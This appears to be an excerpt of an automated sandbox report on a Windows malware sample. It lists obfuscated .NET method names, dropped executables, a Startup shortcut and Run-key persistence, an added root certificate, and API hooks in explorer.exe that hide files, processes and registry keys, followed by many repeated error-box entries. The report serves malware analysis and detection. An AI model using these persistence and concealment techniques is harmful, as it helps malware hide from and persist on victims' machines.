Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs High entropy of concatenated method names: 'OJnYUbLkwSxKjmU6fKV2Hlw1IQDrrJ', 'tvU9fWfrnnauFESq3CZMjJqgWzCcQiVr8uOuybtYGmaAmLPTrBRbSmpeagqUwJ0IALVMMAlEq32BxT15HJetiYKVXqlBwiRN1', 'k27RKeDihzBbcaefRpL4TKPMWxclxn8k5c0RxZP7mcnpWucKutGtmjKZrYx20HvHIzkMsxzKuui79OmMLiSyzphYgEiKf93jl', 'Kdk7fsQFZWfb1NTSDwX0JpPEu3wN1ciOsKyPwnWHaTkkzFYlgvY2wLJUeOMcOnyeSOxZT6WHdCzt3OQdLa8', 'ZNCH16SUBJBa1infvnuYgiLTJaADVvvCpDUyOhAylbPs8EBspiKDd2NBofvowFjy7xlhRV6MgZ2dosI75Nq'
Source: x4usb.exe.2.dr, xfwOCj1PDUkyxHJ.cs High entropy of concatenated method names: 'reqGHXI3G9wXso5', 'A3d5XBF2z5oVzdx', 'eM62vnBwLjHrGH0', 'a26UulBrBUIfuU8QpVdSBT5Y3', 'YnSkjpcwirB2DXcYUxXJJeLWI', 'ixkWVXbVwenR10cANu7dJKP7g', 'mYx4myPdes6v7IW2guHXEk0XM', 'USsEupRWAqKevrdsDYC30x7bu', '_6XZAKoQQgtBVHjhY9SsBP8xLt', 'vZHNXXe8F6yEh1yOyQfUiLBS9'
Source: x4usb.exe.2.dr, hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.cs High entropy of concatenated method names: 'rWnjj3kE8i3rPLazoNf2St5AvccdZSJzR', 'sK0plnUhQjmhNNHfuS67N2yUQVQz4JiDZ', '_53WT8ngowxa7xthsXFFK8XeCjlHGk5Xmj', 'QD4jyzyxsnE0p6sTm96SrGfkWZdAoVoIk'
Source: x4usb.exe.2.dr, oqXYL7IBPbaOrkCLfAY49RFSxlJrU3xfS77bdqqQ5SraRAZwMVptFdt.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_1pKE2dRjC82lv6NlWDIGaThfWYlfx4Vo4', 'mTqpVonBrB3IDzdoyAwNFf98atXrckdFf', 'PQAExrLV3pDxmbwvvKsu4AWoINLVIjAvI', 'XPSWdY17exp3KlEhvfjyng5wzdFRgqDIo'
Source: x4usb.exe.2.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs High entropy of concatenated method names: '_9KmzWj2mwalDOEBlyNP2RUmHGVJB0Z', 'oNXUpbPnIS5Rns1h69KZvbAfoRftvh', '_4jJu4Ia8z76oSV28Fbxqh2YxmM07G3', 'riqvGqOv1KqQr5kNYYUa2zhmrrkhvN', 'X1OxpIzLyhBl4TmbQKUQPdwhwgIGFJ', '_4kYSuRCBtXmtF4hZe7PcbiBTtCaVIg', '_45JikAg8ztoISYnTCTSKoerahn7Fh8', 'ftJZQZj46Ym8TmBooihlwWVW6mc6Qs', '_4mwLd6KxylnKnpZdEn9yb2RylClmkg', '_43NfPF5LUzaG2UCFRfZoKd43V2Y71J'
Source: x4usb.exe.2.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs High entropy of concatenated method names: 'E6lcacwk2Om4Jre8Zxlnx2uuwE3DSa', 'nEAfdyNliOQh4RbARZ4Mjrvp3lU9pw', 'H8c3AG7ObEKhDaQZQGLQNSaeOEF1MJ', 'CPxSbcTtcwCHCECL8MoBfAM4Ty8FRv', 'hbFWqMrhwX3iTTU', 'F2nHLZLu6dLkjSs', 'ozzr0SK9SyLkHPg', 'fIUf7QsKIygwHOo', '_6ZiCijBXyYwGoVC', 'dRhGyU4nmdwkQ0r'
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs High entropy of concatenated method names: 'MuXxwXMdWpj7xWfZCFLL3ajC86y3HE', 'Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw', 'GDO8A3hX6t4WEqwjwDmkN9QX1di8dA', '_5r19egLavdE3pWQeJ25pnksK8bXRUF', 'hTZmQb61o9zj5OrkvKSmDe6Dn0YcwV', '_8ZLzAgSEWrGxT2bsbvXNRGhoqnDFts', 'COTHbvM7SEhrqKoXNPnzOeAV5YgdKV', 'Jz8IH3YoK4J9mxv3FUpFYpuTYdowWR', 'TBxbKfZSmgHZ9whZ3JbDGlqvOrEfna', 'MhOzbgjjU4AbicRDgrjOYm29se7kjw'
Source: x4usb.exe.2.dr, 2GeJGBZ9s7f00k3MrIG6jUSZ27JzDpdLtJapZiFUDiIPvwDFAaMrisXFq17tsOrZFaIFb6cVJvf4N9MUGa9BFHlG.cs High entropy of concatenated method names: 'z1LzC6OirZQYgRajqkXBhte5gh9cv4LgGo3P1E2BJiHNBuOSiZJigIuiAkPFEDHCDVm4JYf9fwPOeIqIlhVif8jd', 'HCuQxWK61KjHlQFB3M0c4VHJAaL6HrtPZDHGB8NaNSZq6UkCD0sKzCXaSPWKon2xn7FWCpURH9umJNAI5wdFooOO', '_1WMMCf1RCWPIZjJAw5BK2pk7i0eukKPmEt4AeDUNcJ7JnLAVp1iAzXJuj91qkclSY3GnfmyL5AV9RiknQciWCej7', 'WakgiKHdUOu78VuIIKHZ8zGfJ34jFVbA1LIqQTZlGEjfUnSEU8p85cj0GZzXVZeDdbSRPUcLb8ClWbJM4VPmJ9iw', 'kYkGiTHBpkN4O55gQqmuNZa55cxWW239wKIErOIZL2UdORA3BMlJ9P29ysS8z4uHaz3WQqkwgNodyhcstP3NBaw9', 'AWq5zbRm4tFVd34LPvDKiiEM3AMmOYr01Yx2btbKOEixxWORG3DLG2pPf3JPv1GnhTWTIc3QTE7RxXDDqSUoq2sB', 'ErFN0wMw3jBZKG8RpL7gOeUUeMzXUQeuP98eTqAgR5mYRoGPnH45UPYSv89wOFV2THc6uSTjPClTbRCnZ7Qz6wKk', 'q8opKTgZkDsYXfN2NJLUEevH0yTqFb4r5IsoBmPy5iYX6ajuruWSA6kC40jSandPrrkT8GIPykkQciP4NE9snONl', 'UfyPTB51UMnUJ4m08aCQ5xJbrmtLG4', 'zoFPojQVB5ILw3JamQNmwW2ZDKvWyA'
Source: x4usb.exe.2.dr, vthpzjkPbD10MqQvse8d9fgJdMuC69.cs High entropy of concatenated method names: '_4FWlZlOv9mJvgefZ0oZnm4oehhLgu7', 'lnELcVdQS1KjcheIGYrB4ncZtrtGJ1', 'khljFe8k3eynRCcPUrTtQcLDJSfYdW', '_3pHprr9Uje78hOKmIDBwm74LcLR0gf', 'Y5J6lR8AXCpHirkDqZHu1AxA9OvKJbnJTugtJarDfVGeTU8peTob1op3HF6Nhe5YT0xNJjLPbNs6oEbgQGPe4LnhRTvQboc6N', 'bhaqJNHS2LH8epigaJtBlgMA2LQbW4n33Lgwf215UT60eyD9EHmyNDEWkVlik8c6jEl3iOysXcy9cIlscLLrmBhYyTQgafHw7', 'TlCcWOPNdmYoiwcRNmDsu3nZpJt9JjHfl647IMjnHYXDgPBs9vDpl2W2Zi09X0tLuME6YggpUOZZKmc59tFSy73v8AaSjeH3L', '_0RTp1iMhbSwasiCO1wAvDGgmeICOBLbCdi0UHWmgt5R6ftDE92322bTynImnNZe0NJWfGFeRYjPkUaF2d2N2kyeiYXBZ0Pd2s', 'ezUslj75uOCTADP6qP5EUIYwDx51Bo18aSlvhYg0ygBxP6fectATG16mbwziR5jIer6tycwZJOVw5TpWpnGDNwIfVzn5lAWLE', 'K6HJdPff3bNq0gfmsoCxocbF6Eyi361PVuyR3ArlJfkLRsWX9RI9Q9SiBYnuSiLG69BuhvE23aOFXboZJNozy7lvQoyJGQ84q'
Source: x4usb.exe.2.dr, KgvNpQFD1pgyslmvoLVzYtqStdU0vY.cs High entropy of concatenated method names: '_8OqKNdBpQOiP48byjobgpYdKjvomXU', 'bSMJ4wPTjULuRIGy20UVskepWllP8tk4XXKMa9hhWQ4xSP9EjJMUqTPO4upHSn5rtUuCwfq9Gr4oZSRYZE5uKPuqxQKdonuya', 'wKT6cqounpHYRYFCkj4gBtSbVwIDF60ELB01T92h8bh6mYlu0i92K6L8ZXsf4XHyaAi0s6qGfXrcIK6okzaEJXTR1NZBhKKJ3', 'FQKjPf2hqoC1UlXmUSQMOVlJtO41IdIgkPZql4wdu4YM059Qm8JumuCUvPqQvXel1aTrhIdZcx7JdoYlxAavrNAiKQ4Cqx3a6', 'p2o0lampFTBN00Sl2Ly0kao2KUg8HEgfgNWBsGWwrRNVRf3xcSm1prkmpTZ37cJnWU6TxDbV3JzbDLvYcTDQMtw0REG1BG3Eo'
Source: x4usb.exe.2.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs High entropy of concatenated method names: 'OJnYUbLkwSxKjmU6fKV2Hlw1IQDrrJ', 'tvU9fWfrnnauFESq3CZMjJqgWzCcQiVr8uOuybtYGmaAmLPTrBRbSmpeagqUwJ0IALVMMAlEq32BxT15HJetiYKVXqlBwiRN1', 'k27RKeDihzBbcaefRpL4TKPMWxclxn8k5c0RxZP7mcnpWucKutGtmjKZrYx20HvHIzkMsxzKuui79OmMLiSyzphYgEiKf93jl', 'Kdk7fsQFZWfb1NTSDwX0JpPEu3wN1ciOsKyPwnWHaTkkzFYlgvY2wLJUeOMcOnyeSOxZT6WHdCzt3OQdLa8', 'ZNCH16SUBJBa1infvnuYgiLTJaADVvvCpDUyOhAylbPs8EBspiKDd2NBofvowFjy7xlhRV6MgZ2dosI75Nq'

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\x433.exe File created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Jump to dropped file
Source: C:\Users\user\Desktop\x433.exe File created: C:\Users\user\AppData\Local\Temp\x4host.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File created: C:\Users\user\AppData\Local\x4usb.exe Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4usb.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\x4host.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4usb.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 1_2_0078CBD0
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run x4usb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run x4usb Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Stores large binary data to the registry
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE x4stager Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\x4usb.exe Process information set: NOOPENFILEERRORBOX
